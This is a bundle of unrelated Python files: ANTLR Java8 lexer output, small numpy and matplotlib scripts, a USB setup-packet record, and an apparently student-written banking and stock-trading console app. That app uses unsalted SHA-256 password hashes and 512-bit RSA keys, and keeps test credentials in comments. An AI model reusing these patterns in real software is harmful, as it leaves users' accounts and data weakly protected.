buf.write(u"\u03c7\u00f2\3\2\2\2\u03c8\u03c9\7(\2\2\u03c9\u03ca\7")
buf.write(u"(\2\2\u03ca\u00f4\3\2\2\2\u03cb\u03cc\7~\2\2\u03cc\u03cd")
buf.write(u"\7~\2\2\u03cd\u00f6\3\2\2\2\u03ce\u03cf\7-\2\2\u03cf")
buf.write(u"\u03d0\7-\2\2\u03d0\u00f8\3\2\2\2\u03d1\u03d2\7/\2\2")
buf.write(u"\u03d2\u03d3\7/\2\2\u03d3\u00fa\3\2\2\2\u03d4\u03d5\7")
buf.write(u"-\2\2\u03d5\u00fc\3\2\2\2\u03d6\u03d7\7/\2\2\u03d7\u00fe")
buf.write(u"\3\2\2\2\u03d8\u03d9\7,\2\2\u03d9\u0100\3\2\2\2\u03da")
buf.write(u"\u03db\7\61\2\2\u03db\u0102\3\2\2\2\u03dc\u03dd\7(\2")
buf.write(u"\2\u03dd\u0104\3\2\2\2\u03de\u03df\7~\2\2\u03df\u0106")
buf.write(u"\3\2\2\2\u03e0\u03e1\7`\2\2\u03e1\u0108\3\2\2\2\u03e2")
buf.write(u"\u03e3\7\'\2\2\u03e3\u010a\3\2\2\2\u03e4\u03e5\7/\2\2")
buf.write(u"\u03e5\u03e6\7@\2\2\u03e6\u010c\3\2\2\2\u03e7\u03e8\7")
buf.write(u"<\2\2\u03e8\u03e9\7<\2\2\u03e9\u010e\3\2\2\2\u03ea\u03eb")
buf.write(u"\7-\2\2\u03eb\u03ec\7?\2\2\u03ec\u0110\3\2\2\2\u03ed")
buf.write(u"\u03ee\7/\2\2\u03ee\u03ef\7?\2\2\u03ef\u0112\3\2\2\2")
buf.write(u"\u03f0\u03f1\7,\2\2\u03f1\u03f2\7?\2\2\u03f2\u0114\3")
buf.write(u"\2\2\2\u03f3\u03f4\7\61\2\2\u03f4\u03f5\7?\2\2\u03f5")
buf.write(u"\u0116\3\2\2\2\u03f6\u03f7\7(\2\2\u03f7\u03f8\7?\2\2")
buf.write(u"\u03f8\u0118\3\2\2\2\u03f9\u03fa\7~\2\2\u03fa\u03fb\7")
buf.write(u"?\2\2\u03fb\u011a\3\2\2\2\u03fc\u03fd\7`\2\2\u03fd\u03fe")
buf.write(u"\7?\2\2\u03fe\u011c\3\2\2\2\u03ff\u0400\7\'\2\2\u0400")
buf.write(u"\u0401\7?\2\2\u0401\u011e\3\2\2\2\u0402\u0403\7>\2\2")
buf.write(u"\u0403\u0404\7>\2\2\u0404\u0405\7?\2\2\u0405\u0120\3")
buf.write(u"\2\2\2\u0406\u0407\7@\2\2\u0407\u0408\7@\2\2\u0408\u0409")
buf.write(u"\7?\2\2\u0409\u0122\3\2\2\2\u040a\u040b\7@\2\2\u040b")
buf.write(u"\u040c\7@\2\2\u040c\u040d\7@\2\2\u040d\u040e\7?\2\2\u040e")
buf.write(u"\u0124\3\2\2\2\u040f\u0413\5\u0127\u0094\2\u0410\u0412")
buf.write(u"\5\u0129\u0095\2\u0411\u0410\3\2\2\2\u0412\u0415\3\2")
buf.write(u"\2\2\u0413\u0411\3\2\2\2\u0413\u0414\3\2\2\2\u0414\u0126")
buf.write(u"\3\2\2\2\u0415\u0413\3\2\2\2\u0416\u041d\t\21\2\2\u0417")
buf.write(u"\u0418\n\22\2\2\u0418\u041d\6\u0094\2\2\u0419\u041a\t")
buf.write(u"\23\2\2\u041a\u041b\t\24\2\2\u041b\u041d\6\u0094\3\2")
buf.write(u"\u041c\u0416\3\2\2\2\u041c\u0417\3\2\2\2\u041c\u0419")
buf.write(u"\3\2\2\2\u041d\u0128\3\2\2\2\u041e\u0425\t\25\2\2\u041f")
buf.write(u"\u0420\n\22\2\2\u0420\u0425\6\u0095\4\2\u0421\u0422\t")
buf.write(u"\23\2\2\u0422\u0423\t\24\2\2\u0423\u0425\6\u0095\5\2")
buf.write(u"\u0424\u041e\3\2\2\2\u0424\u041f\3\2\2\2\u0424\u0421")
buf.write(u"\3\2\2\2\u0425\u012a\3\2\2\2\u0426\u0427\7B\2\2\u0427")
buf.write(u"\u012c\3\2\2\2\u0428\u0429\7\60\2\2\u0429\u042a\7\60")
buf.write(u"\2\2\u042a\u042b\7\60\2\2\u042b\u012e\3\2\2\2\u042c\u042e")
buf.write(u"\t\26\2\2\u042d\u042c\3\2\2\2\u042e\u042f\3\2\2\2\u042f")
buf.write(u"\u042d\3\2\2\2\u042f\u0430\3\2\2\2\u0430\u0431\3\2\2")
buf.write(u"\2\u0431\u0432\b\u0098\2\2\u0432\u0130\3\2\2\2\u0433")
buf.write(u"\u0434\7\61\2\2\u0434\u0435\7,\2\2\u0435\u0439\3\2\2")
buf.write(u"\2\u0436\u0438\13\2\2\2\u0437\u0436\3\2\2\2\u0438\u043b")
buf.write(u"\3\2\2\2\u0439\u043a\3\2\2\2\u0439\u0437\3\2\2\2\u043a")
buf.write(u"\u043c\3\2\2\2\u043b\u0439\3\2\2\2\u043c\u043d\7,\2\2")
buf.write(u"\u043d\u043e\7\61\2\2\u043e\u043f\3\2\2\2\u043f\u0440")
buf.write(u"\b\u0099\2\2\u0440\u0132\3\2\2\2\u0441\u0442\7\61\2\2")
buf.write(u"\u0442\u0443\7\61\2\2\u0443\u0447\3\2\2\2\u0444\u0446")
buf.write(u"\n\27\2\2\u0445\u0444\3\2\2\2\u0446\u0449\3\2\2\2\u0447")
buf.write(u"\u0445\3\2\2\2\u0447\u0448\3\2\2\2\u0448\u044a\3\2\2")
buf.write(u"\2\u0449\u0447\3\2\2\2\u044a\u044b\b\u009a\2\2\u044b")
buf.write(u"\u0134\3\2\2\29\2\u028c\u0290\u0294\u0298\u029c\u02a3")
buf.write(u"\u02a8\u02aa\u02ae\u02b1\u02b5\u02bc\u02c0\u02c5\u02cd")
buf.write(u"\u02d0\u02d7\u02db\u02df\u02e5\u02e8\u02ef\u02f3\u02fb")
buf.write(u"\u02fe\u0305\u0309\u030d\u0312\u0315\u0318\u031d\u0320")
buf.write(u"\u0325\u032a\u0332\u033d\u0341\u0346\u034a\u035a\u0364")
buf.write(u"\u036a\u0371\u0375\u037b\u0388\u0390\u0413\u041c\u0424")
buf.write(u"\u042f\u0439\u0447\3\b\2\2")
return buf.getvalue()
class Java8Lexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
ABSTRACT = 1
ASSERT = 2
BOOLEAN = 3
BREAK = 4
BYTE = 5
CASE = 6
CATCH = 7
CHAR = 8
CLASS = 9
CONST = 10
CONTINUE = 11
DEFAULT = 12
DO = 13
DOUBLE = 14
ELSE = 15
ENUM = 16
EXTENDS = 17
FINAL = 18
FINALLY = 19
FLOAT = 20
FOR = 21
IF = 22
GOTO = 23
IMPLEMENTS = 24
IMPORT = 25
INSTANCEOF = 26
INT = 27
INTERFACE = 28
LONG = 29
NATIVE = 30
NEW = 31
PACKAGE = 32
PRIVATE = 33
PROTECTED = 34
PUBLIC = 35
RETURN = 36
SHORT = 37
STATIC = 38
STRICTFP = 39
SUPER = 40
SWITCH = 41
SYNCHRONIZED = 42
THIS = 43
THROW = 44
THROWS = 45
TRANSIENT = 46
TRY = 47
VOID = 48
VOLATILE = 49
WHILE = 50
IntegerLiteral = 51
FloatingPointLiteral = 52
BooleanLiteral = 53
CharacterLiteral = 54
StringLiteral = 55
NullLiteral = 56
LPAREN = 57
RPAREN = 58
LBRACE = 59
RBRACE = 60
LBRACK = 61
RBRACK = 62
SEMI = 63
COMMA = 64
DOT = 65
ASSIGN = 66
GT = 67
LT = 68
BANG = 69
TILDE = 70
QUESTION = 71
COLON = 72
EQUAL = 73
LE = 74
GE = 75
NOTEQUAL = 76
AND = 77
OR = 78
INC = 79
DEC = 80
ADD = 81
SUB = 82
MUL = 83
DIV = 84
BITAND = 85
BITOR = 86
CARET = 87
MOD = 88
ARROW = 89
COLONCOLON = 90
ADD_ASSIGN = 91
SUB_ASSIGN = 92
MUL_ASSIGN = 93
DIV_ASSIGN = 94
AND_ASSIGN = 95
OR_ASSIGN = 96
XOR_ASSIGN = 97
MOD_ASSIGN = 98
LSHIFT_ASSIGN = 99
RSHIFT_ASSIGN = 100
URSHIFT_ASSIGN = 101
Identifier = 102
AT = 103
ELLIPSIS = 104
WS = 105
COMMENT = 106
LINE_COMMENT = 107
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ u"DEFAULT_MODE" ]
literalNames = [ u"<INVALID>",
u"'abstract'", u"'assert'", u"'boolean'", u"'break'", u"'byte'",
u"'case'", u"'catch'", u"'char'", u"'class'", u"'const'", u"'continue'",
u"'default'", u"'do'", u"'double'", u"'else'", u"'enum'", u"'extends'",
u"'final'", u"'finally'", u"'float'", u"'for'", u"'if'", u"'goto'",
u"'implements'", u"'import'", u"'instanceof'", u"'int'", u"'interface'",
u"'long'", u"'native'", u"'new'", u"'package'", u"'private'",
u"'protected'", u"'public'", u"'return'", u"'short'", u"'static'",
u"'strictfp'", u"'super'", u"'switch'", u"'synchronized'", u"'this'",
u"'throw'", u"'throws'", u"'transient'", u"'try'", u"'void'",
u"'volatile'", u"'while'", u"'null'", u"'('", u"')'", u"'{'",
u"'}'", u"'['", u"']'", u"';'", u"','", u"'.'", u"'='", u"'>'",
u"'<'", u"'!'", u"'~'", u"'?'", u"':'", u"'=='", u"'<='", u"'>='",
u"'!='", u"'&&'", u"'||'", u"'++'", u"'--'", u"'+'", u"'-'",
u"'*'", u"'/'", u"'&'", u"'|'", u"'^'", u"'%'", u"'->'", u"'::'",
u"'+='", u"'-='", u"'*='", u"'/='", u"'&='", u"'|='", u"'^='",
u"'%='", u"'<<='", u"'>>='", u"'>>>='", u"'@'", u"'...'" ]
symbolicNames = [ u"<INVALID>",
u"ABSTRACT", u"ASSERT", u"BOOLEAN", u"BREAK", u"BYTE", u"CASE",
u"CATCH", u"CHAR", u"CLASS", u"CONST", u"CONTINUE", u"DEFAULT",
u"DO", u"DOUBLE", u"ELSE", u"ENUM", u"EXTENDS", u"FINAL", u"FINALLY",
u"FLOAT", u"FOR", u"IF", u"GOTO", u"IMPLEMENTS", u"IMPORT",
u"INSTANCEOF", u"INT", u"INTERFACE", u"LONG", u"NATIVE", u"NEW",
u"PACKAGE", u"PRIVATE", u"PROTECTED", u"PUBLIC", u"RETURN",
u"SHORT", u"STATIC", u"STRICTFP", u"SUPER", u"SWITCH", u"SYNCHRONIZED",
u"THIS", u"THROW", u"THROWS", u"TRANSIENT", u"TRY", u"VOID",
u"VOLATILE", u"WHILE", u"IntegerLiteral", u"FloatingPointLiteral",
u"BooleanLiteral", u"CharacterLiteral", u"StringLiteral", u"NullLiteral",
u"LPAREN", u"RPAREN", u"LBRACE", u"RBRACE", u"LBRACK", u"RBRACK",
u"SEMI", u"COMMA", u"DOT", u"ASSIGN", u"GT", u"LT", u"BANG",
u"TILDE", u"QUESTION", u"COLON", u"EQUAL", u"LE", u"GE", u"NOTEQUAL",
u"AND", u"OR", u"INC", u"DEC", u"ADD", u"SUB", u"MUL", u"DIV",
u"BITAND", u"BITOR", u"CARET", u"MOD", u"ARROW", u"COLONCOLON",
u"ADD_ASSIGN", u"SUB_ASSIGN", u"MUL_ASSIGN", u"DIV_ASSIGN",
u"AND_ASSIGN", u"OR_ASSIGN", u"XOR_ASSIGN", u"MOD_ASSIGN", u"LSHIFT_ASSIGN",
u"RSHIFT_ASSIGN", u"URSHIFT_ASSIGN", u"Identifier", u"AT", u"ELLIPSIS",
u"WS", u"COMMENT", u"LINE_COMMENT" ]
ruleNames = [ u"ABSTRACT", u"ASSERT", u"BOOLEAN", u"BREAK", u"BYTE",
u"CASE", u"CATCH", u"CHAR", u"CLASS", u"CONST", u"CONTINUE",
u"DEFAULT", u"DO", u"DOUBLE", u"ELSE", u"ENUM", u"EXTENDS",
u"FINAL", u"FINALLY", u"FLOAT", u"FOR", u"IF", u"GOTO",
u"IMPLEMENTS", u"IMPORT", u"INSTANCEOF", u"INT", u"INTERFACE",
u"LONG", u"NATIVE", u"NEW", u"PACKAGE", u"PRIVATE", u"PROTECTED",
u"PUBLIC", u"RETURN", u"SHORT", u"STATIC", u"STRICTFP",
u"SUPER", u"SWITCH", u"SYNCHRONIZED", u"THIS", u"THROW",
u"THROWS", u"TRANSIENT", u"TRY", u"VOID", u"VOLATILE",
u"WHILE", u"IntegerLiteral", u"DecimalIntegerLiteral",
u"HexIntegerLiteral", u"OctalIntegerLiteral", u"BinaryIntegerLiteral",
u"IntegerTypeSuffix", u"DecimalNumeral", u"Digits", u"Digit",
u"NonZeroDigit", u"DigitsAndUnderscores", u"DigitOrUnderscore",
u"Underscores", u"HexNumeral", u"HexDigits", u"HexDigit",
u"HexDigitsAndUnderscores", u"HexDigitOrUnderscore", u"OctalNumeral",
u"OctalDigits", u"OctalDigit", u"OctalDigitsAndUnderscores",
u"OctalDigitOrUnderscore", u"BinaryNumeral", u"BinaryDigits",
u"BinaryDigit", u"BinaryDigitsAndUnderscores", u"BinaryDigitOrUnderscore",
u"FloatingPointLiteral", u"DecimalFloatingPointLiteral",
u"ExponentPart", u"ExponentIndicator", u"SignedInteger",
u"Sign", u"FloatTypeSuffix", u"HexadecimalFloatingPointLiteral",
u"HexSignificand", u"BinaryExponent", u"BinaryExponentIndicator",
u"BooleanLiteral", u"CharacterLiteral", u"SingleCharacter",
u"StringLiteral", u"StringCharacters", u"StringCharacter",
u"EscapeSequence", u"OctalEscape", u"ZeroToThree", u"UnicodeEscape",
u"NullLiteral", u"LPAREN", u"RPAREN", u"LBRACE", u"RBRACE",
u"LBRACK", u"RBRACK", u"SEMI", u"COMMA", u"DOT", u"ASSIGN",
u"GT", u"LT", u"BANG", u"TILDE", u"QUESTION", u"COLON",
u"EQUAL", u"LE", u"GE", u"NOTEQUAL", u"AND", u"OR", u"INC",
u"DEC", u"ADD", u"SUB", u"MUL", u"DIV", u"BITAND", u"BITOR",
u"CARET", u"MOD", u"ARROW", u"COLONCOLON", u"ADD_ASSIGN",
u"SUB_ASSIGN", u"MUL_ASSIGN", u"DIV_ASSIGN", u"AND_ASSIGN",
u"OR_ASSIGN", u"XOR_ASSIGN", u"MOD_ASSIGN", u"LSHIFT_ASSIGN",
u"RSHIFT_ASSIGN", u"URSHIFT_ASSIGN", u"Identifier", u"JavaLetter",
u"JavaLetterOrDigit", u"AT", u"ELLIPSIS", u"WS", u"COMMENT",
u"LINE_COMMENT" ]
grammarFileName = u"Java8.g4"
def __init__(self, input=None, output=sys.stdout):
super(Java8Lexer, self).__init__(input, output=output)
self.checkVersion("4.7.1")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
def sempred(self, localctx, ruleIndex, predIndex):
if self._predicates is None:
preds = dict()
preds[146] = self.JavaLetter_sempred
preds[147] = self.JavaLetterOrDigit_sempred
self._predicates = preds
pred = self._predicates.get(ruleIndex, None)
if pred is not None:
return pred(localctx, predIndex)
else:
raise Exception("No registered predicate for:" + str(ruleIndex))
def JavaLetter_sempred(self, localctx, predIndex):
if predIndex == 0:
return Character.isJavaIdentifierStart(_input.LA(-1))
if predIndex == 1:
return Character.isJavaIdentifierStart(Character.toCodePoint(_input.LA(-2), _input.LA(-1)))
def JavaLetterOrDigit_sempred(self, localctx, predIndex):
if predIndex == 2:
return Character.isJavaIdentifierPart(_input.LA(-1))
if predIndex == 3:
return Character.isJavaIdentifierPart(Character.toCodePoint(_input.LA(-2), _input.LA(-1)))
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#百个眼镜,摆成一个圈,全部正面向上,第一个人将每个翻动一次,一共翻了100次;第二个人从no.2开始隔一个翻一次,也翻100次;第3个人从no.3开始隔两个翻一次,翻100次,问100个人之后,多少眼镜正面向上
import numpy as np
l=[]
n=100
a=np.zeros(n)
for i in range(1,n+1):
for j in range(i,(n+1)*i,i):
while(j>n):
if(j<=n):
if(a[j-1]==0):
a[j-1]=1
else:
a[j-1]=0
else:
j=j-n
if(a[j-1]==0):
a[j-1]=1
else:
a[j-1]=0
for x in range(n):
if(a[x]==0):
l.append(x+1)
print l
|
import threading
import sys
import hashlib
import sqlite3
import hmac
import rsa
class Customer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.connection = sqlite3.connect("Customer_Teller_loginInfo.db")
self.pubkey, self.privkey = rsa.newkeys(512)
self.cursor = self.connection.cursor()
self.stock_system = Stock_Trading_System()
def log_on(self):
# assume user info is already in the data base
userId = input(str("ID: "))
userPass = input(str("Password: "))
# grants access if hashed password matches the data base
cursor.execute("SELECT * FROM users WHERE userId = ?", (userId,))
user = cursor.fetchall()
try:
if user[0][1] != hashlib.sha256(userPass.encode()).hexdigest():
print("Password did not match.")
print()
return
except:
print("That username does not exist.")
return
while True:
print("----------------------------------")
print("What would you like to do?")
print("1. Return to menu")
print("2. Query account")
print("3. Transfer funds")
print("4. View profile")
print("5. Query stock")
print("6. Buy stock")
print("7. Sell Stock")
print("8. Log off")
print("----------------------------------")
choice = input("Enter a number choice here: ")
if choice == "1":
# return to menu
pass
if choice == "2":
self.query_account(userId)
if choice == "3":
self.transfer_funds(userId)
if choice == "4":
self.view_profile(userId)
if choice == "5":
self.query_stock(userId)
if choice == "6":
self.buy_stock(userId)
if choice == "7":
self.sell_stock(userId)
if choice == "8":
confirm = self.log_out()
if confirm:
return
else:
pass
def log_out(self):
choice = input("Are you sure you want to log-off?\nEnter y for yes, anything else for no: ")
if choice == 'y':
return True
else:
return False
def query_account(self, userId):
print()
acc_num = input("Enter the account number: ")
# input logic here for checking account number with user
cursor.execute("SELECT * FROM users WHERE AccountNumber = ?", (acc_num,))
accInfo = cursor.fetchone()
if userId == accInfo[0]:
print("Valid account number\n")
cursor.execute("SELECT * FROM Bank_Account where UserId = ?", (userId,))
balanceInfo = cursor.fetchone()
print("Your account balance: $", balanceInfo[1])
else:
print("Invalid account number")
return
def transfer_funds(self, userId):
print("\nTransfer funds\n\n\n")
transferAmount = float(input("Enter amount: $"))
fromAccount = int(input("Enter your account number: "))
toAccount = int(input("Enter the account number of the receiver: "))
cursor.execute("SELECT * FROM users WHERE userId = ?", (userId,))
accInfo = cursor.fetchone()
# checks if fromAccount matches their account number
if str(fromAccount) == str(accInfo[2]):
# checks if toAccount number exists
cursor.execute("SELECT * From users WHERE AccountNumber = ?", (toAccount,))
accnumberInfo = cursor.fetchall()
if len(accnumberInfo) != 0:
# check sending amount
cursor.execute("SELECT * FROM Bank_Account WHERE UserId = ?", (userId,))
bankInfo = cursor.fetchone()
if transferAmount <= bankInfo[1]:
# create a message digest to make sure transfer account has not been tampered
amountHash = hashlib.sha256(str(transferAmount).encode()).hexdigest()
print("Sending $", transferAmount, "to account number:", toAccount)
# update user bank account balance
newAmount = bankInfo[1] - transferAmount
print(newAmount)
cursor.execute("UPDATE Bank_Account SET Balance = ? WHERE userId = ?", (newAmount, userId))
cursor.execute("SELECT * FROM Bank_Account WHERE UserId = ?", (userId,))
dx = cursor.fetchone()
connection.commit()
else:
print("Insufficient balance")
return
else:
print("Invalid sending account number")
return
else:
print("Invalid account number")
return
def view_profile(self, userId):
cursor.execute("SELECT * FROM User_Profile WHERE userId = ?", (userId,))
userProfile = cursor.fetchone()
print("User profile\n")
print("userId: ", userId)
print("\nFull Name: ", userProfile[1])
print("\nSSN: ", userProfile[2])
print("\nAddress: ", userProfile[3])
print("\nPhone number: ", userProfile[4])
print("\nIncome: $", userProfile[5])
print("\nEmail: ", userProfile[6])
def query_stock(self, userId):
cursor.execute("SELECT * FROM Stock_Transactions WHERE userId = ?", (userId,))
userStockInfo = cursor.fetchall()
if len(userStockInfo) == 0:
print("This user has no stock information at this time")
else:
pass
def buy_stock(self, userId):
cursor.execute("SELECT * FROM Bank_Account WHERE UserId = ?", (userId,))
bankInfo = cursor.fetchone()
print("User balance: $", bankInfo[1])
print("\n")
stock_name = str(input("Enter stock name: "))
stock_quantiy = int(input("Enter stock quantity: "))
stock_unit_price = int(input("Enter stock price: "))
acc_num = int(input("Enter account number: "))
total_stock_price = stock_quantiy * stock_unit_price
userBalance = bankInfo[1]
if total_stock_price <= userBalance:
# check if user input is correct to create a stock contract
if stock_quantiy > 0 and stock_unit_price > 0:
stock_contract = stock_name + "/" + str(stock_quantiy) + "/" + str(stock_unit_price) + "/" + str(acc_num) + "/" + "B"
print(stock_contract)
signature = rsa.sign(stock_contract.encode(), self.privkey, 'SHA-256')
if self.stock_system.buy_stock(stock_contract,signature,self.pubkey):
self.cursor.execute("INSERT INTO Stock_Transactions (userId,Stock_Name,Type,Amount,Unit_Price) VALUES (?,?,?,?,?)",(userId,stock_name,"BUY",stock_quantiy,stock_unit_price))
connection.commit()
else:
print("Message Compromised.")
return
else:
print("Error entering purchase order into a contract")
return
else:
print("Insufficient funds.")
return
def sell_stock(self,userId):
stock_name = str(input("Enter stock name: "))
stock_quantiy = int(input("Enter stock quantity: "))
stock_unit_price = int(input("Enter stock price: "))
acc_num = int(input("Enter account number: "))
self.cursor.execute("SELECT * FROM users WHERE AccountNumber = ?",(acc_num,))
total_stock_price = stock_quantiy * stock_unit_price
if len(self.cursor.fetchall()) == 0:
print("Invalid Account Number")
return
else:
stock_contract = stock_name + "/" + str(stock_quantiy) + "/" + str(stock_unit_price) + "/" + str(acc_num) + "/" + "S"
signature = rsa.sign(stock_contract.encode(), self.privkey, 'SHA-256')
if self.stock_system.sell_stock(stock_contract,signature,self.pubkey):
self.cursor.execute("INSERT OR IGNORE INTO Stock_Transactions (userId,Stock_Name,Type,Amount,Unit_Price) VALUES (?,?,?,?,?)",(userId,stock_name,"SELL",stock_quantiy,stock_unit_price))
connection.commit()
print("Stock sold.")
else:
print("Message Compromised.")
return
class Bank_Teller(threading.Thread):
def __init__(self):
pass
def log_on(self):
username = input("Enter your username: ")
password = input("Enter your password: ")
cursor.execute("SELECT * FROM users WHERE userId = ?", (username,))
user = cursor.fetchall()
try:
if user[0][1] != hashlib.sha256(password.encode()).hexdigest():
print("Password did not match.")
print()
return
except:
print("That username does not exist.")
return
# input logic here to confirm user/pass
while True:
print("----------------------------------")
print(" What would you like to do?")
print(" 1. Log Off")
print(" 2. Query Account")
print(" 3. Withdraw Funds")
print(" 4. View Profile")
print(" 5. Query Stock")
print("----------------------------------")
choice = input("Enter a number choice here: ")
if choice == "1":
confirm = self.log_out()
if confirm:
return
if choice == "2":
self.query_account()
if choice == "3":
self.withdraw_funds()
if choice == "4":
self.view_profile()
if choice == "5":
self.query_stock()
def log_out(self):
choice = input("Are you sure you want to log-off?\nEnter y for yes, anything else for no: ")
if choice == 'y':
return True
else:
return False
def query_account(self):
print()
acc_num = input("Enter the account number: ")
print(acc_num)
cursor.execute("SELECT * FROM users WHERE AccountNumber = ?", acc_num)
info = cursor.fetchall()
if len(info) == 0:
print("That account number was invalid.")
return
cursor.execute("SELECT * FROM Bank_Account WHERE userId = ?", (info[0][0],))
print("Remaining Balance: $" + str(cursor.fetchall()[0][1]))
print()
def withdraw_funds(self):
print()
amount = input("How much would you like to withdrawl: ")
accnum = input("Which account are you pulling from: ")
cursor.execute("SELECT * FROM users WHERE AccountNumber = ?", accnum)
userInfo = cursor.fetchall()
try:
userInfo = userInfo[0]
except:
print("Could not find a user with that account number.")
return
cursor.execute("SELECT * FROM Bank_Account WHERE userId = ?", (userInfo[0],))
balance = cursor.fetchall()[0][1]
if balance >= int(amount):
# good to go
balance -= int(amount)
a = input("Did you give the customer their cash? Enter Y to continue")
if a == "y":
cursor.execute("UPDATE Bank_Account SET Balance = ? WHERE userId = ?", (balance, userInfo[0]))
else:
print("")
return
else:
print("The balance was less than the amount asked.")
return
print()
def view_profile(self):
print()
name = input("What is the customer's name: ")
ssn = input("What is the customers ssn: ")
cursor.execute("SELECT * FROM User_Profile WHERE name = ? AND ssn = ?", (name, ssn))
try:
stuff = cursor.fetchall()[0]
except:
print("Could not find a user with those credientals.")
return
print("""
UserId: {}
Name: {}
SSN: {}
Address: {}
Phone Number: {}
Income: {}
Email: {}
""".format(stuff[0], stuff[1], stuff[2], stuff[3], stuff[4], stuff[5], stuff[6]))
print()
def query_stock(self):
print()
name = input("What is the customer's name: ")
cursor.execute("SELECT * FROM User_Profile WHERE name = ?", (name,))
try:
userId = cursor.fetchall()[0][0]
except:
print("User not found.")
return
cursor.execute("SELECT * FROM Stock_Transactions WHERE userId = ?", (userId,))
try:
for stuff in cursor.fetchall():
print("""
Stock Name: {}
Type: {}
Amount: {}
Unit Price: {}
""".format(stuff[1], stuff[2], stuff[3], stuff[4]))
except:
print("There are no transactions on this account.")
print()
class Stock_Trading_System(threading.Thread):
def __init__(self):
pass
def buy_stock(self,mess,signature,pubkey):
return rsa.verify(mess.encode(), signature, pubkey)
def sell_stock(self,mess,signature,pubkey):
return rsa.verify(mess.encode(), signature, pubkey)
if __name__ == "__main__":
# user: tellerTest
# pass: password123 / ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f
# user: regUserTest
# pass: password123 / ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f
# this is a test to see the content of the database
# I will delete this later
connection = sqlite3.connect("Customer_Teller_loginInfo.db")
cursor = connection.cursor()
cursor.execute("SELECT * FROM users")
#print(cursor.fetchall())
#print(type(cursor.fetchall()))
while True:
print("----------------------------------")
print("What would you like to do?")
print("1. Login as Customer")
print("2. login as Bank Teller")
print("3. Quit")
print("----------------------------------")
choice = input("Enter a number choice here: ")
if (choice == "1"):
print("Customer Login")
user = Customer()
user.log_on()
elif (choice == "2"):
print("Bank Teller Login")
user = Bank_Teller()
user.log_on()
elif (choice == "3"):
print("Closing system...")
quit(0)
else:
print("Incorrect option...")
|
def meow():
print("Meow!")
print("I am imported") # 이 print 함수는 전역 범위
|
import numpy as np
import distance
class MultiD(object):
"""
不用这个了
直接用numpy的二维矩阵
"""
def __init__(self):
self.nameList = {}
# self.valueList = []
def __getitem__(self, key):
if not self.nameList.__contains__(key):
print("MultiD don't have this key", key)
# return False
return self.nameList[key]
def __setitem__(self, key, value):
self.nameList[key] = value
pass
class MultiSeq(object):
"""
记录输入的维度,时间(长度)
并用长度和维度初始化多维时间序列seq
seq的第一个元素是维度,第二个元素是时间
"""
def __init__(self, dimension, length):
self.dimension = dimension
self.length = length
self.seq = np.zeros((dimension, length))
if __name__ == "__main__":
a = MultiSeq(2, 3) # 2维 长度3
a.seq[0][:] = [1, 2, 3] # 用法
print(a.seq) # seq用法[k,t]
print(a.seq[:, 0:2]) # 取某时间[:,t]
print(a.seq[0, :]) # 取某维度[k,:]
# print(a.seq[0][1])
print(distance.ccmDistance(a.seq[:, 0:2], a.seq[:, 1:3]))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 5 10:43:31 2018
@author: thomas
"""
import numpy as np
import matplotlib.pyplot as plt
def main():
#Color Palette for plotting
#Colors are in the following order: Red/Pink, Orange, Green, Blue, Purple
R1=[255/255,255/255,153/255,153/255,204/255]
G1=[153/255,204/255,255/255,204/255,153/255]
B1=[204/255,153/255,153/255,255/255,255/255]
#Sample Data (Just using numpy for ease)
var1List = [0.2,0.4,0.6]
var2List = [0.5,1.0,1.5]
time = np.linspace(0.0,10.0,10)
velocity = np.zeros((3,3,10))
k = 1.0
for i in range(len(var1List)):
velocity[i,0,:] = np.linspace(0.0,10.0*k,10)
velocity[i,1,:] = np.linspace(0.0,15.0*k,10)
velocity[i,2,:] = np.linspace(0.0,17.0*k,10)
k += 0.2
print('='*40+'\n')
print('i = ',i)
print(velocity[i,:,:])
print('-'*40+'\n')
fig = plt.figure(num=0, figsize=(4,4),dpi=120)
ax = fig.add_subplot(111)
ax.set_title('V vs Time: Color Preview')
ax.set_xlabel('Time (s)')
ax.set_ylabel('Vel (m/s)')
j = 0 #initial color (Red/Pink)
for k in range(len(var1List)):
i = 1 #used to scale line color so there is a gradient as rsl changes (Darkness)
for m in range(len(var2List)):
R = R1[j]*i
G = G1[j]*i
B = B1[j]*i
#Plot each (var1, var2) line
ax.plot(time,velocity[k,m,:],
label='$var1$='+str(var1List[k])+' $var2$='+str(var2List[m]),color=(R,G,B),linewidth=2)
ax.scatter(time,velocity[k,m,:],
label=None,color=(R,G,B),s=18)
i -= 0.66/(len(var2List)+1) #Increase Darkness (-0.66) value can be changed
j += 1 #Increase color index (change color based on var1)
lgd = ax.legend(loc=2, bbox_to_anchor=(1.05,1),borderaxespad=0,ncol=1,fontsize='x-small')
fig.savefig('ColorPreview.png',bbox_extra_artists=(lgd,),bbox_inches='tight')
plt.show()
return
#------------------__END MAIN__-----------------------------------
main()
|
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
""" Request components shared between USB2 and USB3. """
from amaranth import *
from amaranth.hdl.rec import DIR_FANOUT
class SetupPacket(Record):
""" Record capturing the content of a setup packet.
Components (O = output from setup parser; read-only input to others):
O: received -- Strobe; indicates that a new setup packet has been received,
and thus this data has been updated.
O: is_in_request -- High if the current request is an 'in' request.
O: type[2] -- Request type for the current request.
O: recipient[5] -- Recipient of the relevant request.
O: request[8] -- Request number.
O: value[16] -- Value argument for the setup request.
O: index[16] -- Index argument for the setup request.
O: length[16] -- Length of the relevant setup request.
"""
def __init__(self):
super().__init__([
# Byte 1
('recipient', 5, DIR_FANOUT),
('type', 2, DIR_FANOUT),
('is_in_request', 1, DIR_FANOUT),
# Byte 2
('request', 8, DIR_FANOUT),
# Byte 3/4
('value', 16, DIR_FANOUT),
# Byte 5/6
('index', 16, DIR_FANOUT),
# Byte 7/8
('length', 16, DIR_FANOUT),
# Control signaling.
('received', 1, DIR_FANOUT),
])
|
